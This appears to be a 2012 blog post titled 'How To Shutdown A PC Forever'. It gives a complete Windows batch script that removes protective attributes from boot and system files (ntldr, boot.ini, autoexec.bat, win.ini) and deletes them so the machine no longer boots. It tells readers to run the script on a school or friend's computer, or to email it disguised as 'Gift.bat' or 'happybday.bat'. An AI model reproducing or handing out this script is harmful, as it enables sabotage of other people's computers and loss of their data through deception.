Friday, September 21, 2012

How To Shutdown A PC Forever


How To Shutdown A PC Forever
  If you have some personal files in your school’s computer then cant be deleted, or just want to mess with your friends, this article will show you how to shutdown someone’s pc forever by deleting the files needed to reboot and restart.
1)Open notepad and type this code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

2)Save it as name.bat , for example: hackspc.bat , the .bat is important to put or the program will not work. And on the computer you want to shutdown, open it. Or if you want to e-mail it to someone you can change the name something like Gift.bat , happybday.bat.

That’s it! Hope this article helped you.
REMEMBER – DO NOT CLICK THIS FILE. YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

No comments:

Post a Comment